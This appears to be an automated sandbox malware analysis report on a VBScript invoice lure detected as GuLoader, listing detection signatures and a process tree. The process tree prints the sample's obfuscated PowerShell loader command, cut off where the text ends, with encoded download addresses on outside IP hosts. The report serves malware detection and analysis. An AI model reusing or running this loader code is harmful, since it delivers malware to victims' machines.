Edit tour
Windows
Analysis Report
awb_shipping_label_invoice_15_04_2024_000000000000024.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7564 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\awb_s hipping_la bel_invoic e_15_04_20 24_0000000 00000024.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 968 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Krispin = 1;$Synso pfattelsen ='Substrin ';$Synsopf attelsen+= 'g';Functi on Macrome teorology( $Vaults){$ Subquestio ns=$Vaults .Length-$K rispin;For ($Staaltra adsnettet= 2; $Staalt raadsnette t -lt $Sub questions; $Staaltra adsnettet+ =(3)){$Des ignless+=$ Vaults.$Sy nsopfattel sen.Invoke ($Staaltra adsnettet, $Krispin) ;}$Designl ess;}funct ion Loggen ($Darkness es){. ($Opisomet er) ($Dark nesses);}$ Sniffles=M acrometeor ology '.aM KooOvz.fiM ilUnlbea v /.k5 M.Ps0 B, De(.oWB .isanAtd K oGrwTrsTy CoNToT o T r1Cu0Ta.,n 0Fo; rW,a i LnBa6 D4 ,;Sh TexW o6 B4 ,;M, SurRuvPe: Vo1Se2Fi1 R.,u0No),e ,nGFeeKac Ruk PoT / E2Ig0Ps1Ul 0Fo0.m1R 0 St1Op OF H i OrZoeInf .noSex ,/A b1.t2sa1Sp .,r0Pe ';$ Rabiateste =Macromete orology ' SUPhsSte N r ,- nASvg N,emenA.tT . ';$awigg le=Macrome teorology ' nhL.tUat ,pKr:Re/K i/ f9Ch4L, .F 1 5Mo6B a.S,7S,9Ba .Wi6Un4un/ EnsR tT.rS ky Kg ,eS, tVejCos .K vtH,hAfn.i >Veh et Ft Unp F:.e/F a/Ko1b,9ba 3Pu. 2Ri2D u2D .Ch9Hi 6 L.O,1To4 Ca9,e/L sH itMar.pyBr g CePrtAfj ,asSo.TrtI nh rnPr '; $Pteridoph ilism=Macr ometeorolo gy ' .>Mo ';$Opisome ter=Macrom eteorology 'aniL e . x.m ';$Fat ningen = M acrometeor ology 'Ine T.c.hhVaoG e In%enaSp pSkp.adSya TatPraRe%J o\unJRau V n Gk GiH e RnMasC.. SPKar .oMo P.&Z &He Ope.ocInhP ao l ,a$Se ';Loggen (Macromete orology 'B i$ GgO,lMa o,ab ,aKul .e: dHIny BlBsa BsTi mSlu ,sB = Re(Rec Um DdDo C./ a cBr .$seFd vaPrtPunRo iPanStgcee LnH ) M ' );Loggen ( Macrometeo rology 'An $ GgsklA,o Anb oa DlA m:Reb aPrc SmkUnf IiQ ulTals eRe rEl=Ro$Ina TawOri ,g CgMilReeDr .BlsdopN l DoiAptA,(C a$AfPH,tDr eKarI.iSpd Prodvp ,hB ei.plthiIn sTrmF.) K ');$awiggl e=$backfil ler[0];Log gen (Macro meteorolog y 'S,$GagT ,l SoDeb F a.ul B: SK DuoStmYup seBon,asT, e BrS.eGls Fi=O N teE lw F-A.O e b,aj.aeLac Artl cS , yS,sF tSye O mse.SqNG le,rtIn.En W UeAnb .C Sil iBreno n TtJu '); Loggen (Ma crometeoro logy 'Ta$ UKT.o nmEi pG.eInnDrs StePer,re .sF..MuHSy e,ua PdD,e FerKrsLa[R a$ NRAdaSq b Pibda ,t TreAtsHdtC re s]C.=Sa $ rSVenS i UdfR.fKvlF re HsSv ') ;$Kautioni stens=Macr ometeorolo gy 'TeKFao FmBepFeef enKlsMieAs r Ces,si,. LeD oInwSt nCel.eoMaa bidH,F TiS ylAneRe( F $ aWow,iiT .g rg,mlFo eRe,Fo$MeC .vr LoAcf .tPae.prC. iNosLue K) a ';$Kaut ionistens= $Hylasmus[ 1]+$Kautio nistens;$C rofterise= $Hylasmus[ 0];Loggen (Macromete orology ' S$RegK,lVe oEgb.uaHel T :EfsSwiR edDieB n.d uD,mVim Fe idrP,eA.tT esHa=S,(Al TTae,osRat .-.tPDea etSlh v Re $ .CStrBao PfAitAfeF orChiIns.i e,a) ');w hile (!$si denummeret s) {Loggen (Macromet eorology ' p.$,og FlF yoOmb ,a,l lOv:ViBK a RogHahAsaT avPhe Ar , 1.a9Pi=Ma$ ,kt arFouU .e,h ') ;L